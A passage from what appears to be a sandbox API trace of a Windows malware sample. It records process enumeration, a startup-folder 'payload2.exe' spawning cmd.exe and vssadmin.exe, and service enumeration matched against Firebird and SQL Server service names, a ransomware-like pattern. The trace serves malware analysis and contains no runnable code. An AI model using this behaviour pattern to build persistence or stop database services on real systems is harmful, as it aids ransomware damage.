th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.966] lstrlenW (lpString="taskhost.exe") returned 12 [0047.966] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.966] lstrlenW (lpString="svchost.exe") returned 11 [0047.966] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0047.967] lstrlenW (lpString="taskeng.exe") returned 11 [0047.967] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.968] lstrlenW (lpString="taskhost.exe") returned 12 [0047.968] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0047.968] lstrlenW (lpString="challenging.exe") returned 15 [0047.968] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0047.969] lstrlenW (lpString="pgp prix.exe") returned 12 [0047.969] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0047.970] lstrlenW (lpString="user-reno.exe") returned 13 [0047.970] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0047.970] lstrlenW (lpString="aggregate.exe") returned 13 [0047.970] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0047.971] lstrlenW (lpString="dressed.exe") returned 11 [0047.971] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0047.972] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0047.972] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0047.972] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0047.972] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0047.973] lstrlenW (lpString="developing.exe") returned 14 [0047.973] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0047.973] lstrlenW (lpString="supported.exe") returned 13 [0047.974] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0047.974] lstrlenW (lpString="girlstionselect.exe") returned 19 [0047.974] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0047.975] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0047.975] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0047.975] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0047.975] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0047.976] lstrlenW (lpString="eating.exe") returned 10 [0047.976] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0048.028] lstrlenW (lpString="nh_protected.exe") returned 16 [0048.028] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0048.029] lstrlenW (lpString="vulnerability.exe") returned 17 [0048.029] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0048.030] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0048.030] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0048.030] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0048.030] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0048.031] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0048.031] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0048.032] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0048.032] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0048.032] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0048.032] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0048.033] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0048.033] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.033] lstrlenW (lpString="cmd.exe") returned 7 [0048.034] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.034] lstrlenW (lpString="conhost.exe") returned 11 [0048.034] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0048.035] lstrlenW (lpString="vssadmin.exe") returned 12 [0048.035] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0048.035] lstrlenW (lpString="VSSVC.exe") returned 9 [0048.035] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.036] lstrlenW (lpString="svchost.exe") returned 11 [0048.036] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0048.037] CloseHandle (hObject=0x208) returned 1 [0048.037] Sleep (dwMilliseconds=0x1f4) [0048.552] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3940708 [0048.553] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0048.553] GetLastError () returned 0xea [0048.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0048.553] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0048.553] CloseServiceHandle (hSCObject=0x3940708) returned 1 [0048.554] lstrlenW (lpString="Appinfo") returned 7 [0048.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0048.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0048.554] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0048.554] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0048.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0048.554] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0048.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.554] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0048.554] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0048.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0048.554] lstrlenW (lpString="AudioSrv") returned 8 [0048.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0048.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0048.554] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0048.554] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0048.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0048.554] lstrlenW (lpString="BFE") returned 3 [0048.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0048.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0048.554] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0048.554] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0048.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0048.554] lstrlenW (lpString="CryptSvc") returned 8 [0048.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0048.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0048.554] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0048.554] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0048.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0048.554] lstrlenW (lpString="CscService") returned 10 [0048.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0048.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0048.554] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0048.555] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0048.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0048.555] lstrlenW (lpString="DcomLaunch") returned 10 [0048.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.555] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0048.555] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0048.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0048.555] lstrlenW (lpString="Dhcp") returned 4 [0048.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0048.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0048.555] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0048.555] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0048.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0048.555] lstrlenW (lpString="Dnscache") returned 8 [0048.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0048.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0048.555] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0048.555] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0048.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0048.555] lstrlenW (lpString="DPS") returned 3 [0048.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0048.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0048.555] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0048.555] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0048.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0048.555] lstrlenW (lpString="eventlog") returned 8 [0048.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0048.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0048.555] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0048.555] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0048.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0048.556] lstrlenW (lpString="EventSystem") returned 11 [0048.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0048.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0048.556] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0048.556] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0048.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0048.556] lstrlenW (lpString="gpsvc") returned 5 [0048.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0048.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0048.556] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0048.556] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0048.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0048.556] lstrlenW (lpString="iphlpsvc") returned 8 [0048.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.556] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0048.556] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0048.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0048.556] lstrlenW (lpString="LanmanServer") returned 12 [0048.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0048.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0048.556] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0048.556] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0048.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0048.556] lstrlenW (lpString="LanmanWorkstation") returned 17 [0048.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.556] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0048.556] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0048.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0048.556] lstrlenW (lpString="lmhosts") returned 7 [0048.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0048.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0048.556] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0048.556] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0048.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0048.556] lstrlenW (lpString="MMCSS") returned 5 [0048.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0048.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0048.557] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0048.557] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0048.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0048.557] lstrlenW (lpString="MpsSvc") returned 6 [0048.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0048.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0048.557] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0048.557] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0048.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0048.557] lstrlenW (lpString="Netman") returned 6 [0048.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0048.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0048.557] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0048.557] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0048.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0048.557] lstrlenW (lpString="netprofm") returned 8 [0048.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0048.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0048.557] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0048.557] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0048.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0048.557] lstrlenW (lpString="NlaSvc") returned 6 [0048.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0048.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0048.557] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0048.557] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0048.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0048.557] lstrlenW (lpString="nsi") returned 3 [0048.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0048.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0048.557] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0048.557] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0048.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0048.557] lstrlenW (lpString="PcaSvc") returned 6 [0048.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0048.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0048.558] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0048.558] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0048.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0048.558] lstrlenW (lpString="PlugPlay") returned 8 [0048.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0048.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0048.558] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0048.558] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0048.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0048.558] lstrlenW (lpString="Power") returned 5 [0048.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0048.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0048.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0048.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0048.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0048.558] lstrlenW (lpString="ProfSvc") returned 7 [0048.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0048.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0048.558] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0048.558] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0048.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0048.558] lstrlenW (lpString="RpcEptMapper") returned 12 [0048.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.558] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0048.558] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0048.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0048.558] lstrlenW (lpString="RpcSs") returned 5 [0048.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0048.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0048.558] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0048.558] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0048.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0048.558] lstrlenW (lpString="SamSs") returned 5 [0048.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0048.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0048.558] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0048.558] lstrcmpiW (lpString1="mssqlserver", 